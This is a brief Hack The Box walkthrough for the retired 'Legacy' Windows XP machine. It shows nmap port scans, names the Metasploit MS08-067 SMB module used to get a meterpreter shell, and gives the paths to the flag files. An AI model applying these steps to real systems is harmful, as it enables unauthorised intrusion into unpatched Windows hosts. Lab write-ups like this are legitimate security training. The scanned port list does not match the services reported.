Legacy is the easiest windows machine in HTB. However, my steps will not change and I’ll try to keep things as procedural as possible
The [VIP] tag means that this machine is retired and no longer accessible without VIP status on htb.
Index
- Enumeration
- Service exploitation
So, first step, enumeration. Always enumeration.
I have a simple procedure that I use in every machine. First, nmap to discover all open ports
nmap -p- -T4 10.10.10.4 > portscan.txt
The next step will be using those discovered ports and do a full scan only on those ports. This will speed up the enumeration process, as you only scan open ports.
nmap -p 21,22,139,445,3632 -A -T4 10.10.10.4 > fullscan.txt
We get a lot of info. We have two services:
- SMB
- ms-wbt-server
As the last one is in a closed port, we only have SMB left to try to exploit.
A quick search on google for smb windows XP vulnerabilities comes back with the MS08–067 vuln, reportedly giving us rce. Basically, root.
We find a Metasploit module that’ll do the trick. You could manually exploit this, but why should you bother when you have a great tool that is faster. In the end, you are doing the same thing.
use exploit/windows/smb/ms08_067_netapi
So, we check the options for the module and try to run the exploit.
We got a meterpreter session!
Now, execute the shell command to get a windows shell and navigate through the system to find the flags.
Navigate into C:\Documents and Settings\Administrator\Desktopand grab our root.txt
Don’t forget to grab the user.txt from C:\Documents and Settings\john\Desktop
And we’re done.
Follow me on:
Twitter: https://twitter.com/caveeroo
Htb (Respect): https://bit.ly/2WzKgsC
Disclaimer: This article is only meant for educational purposes. Any action that derives from this article which isn’t meant for educational purposes is not, by any means, supported by the author.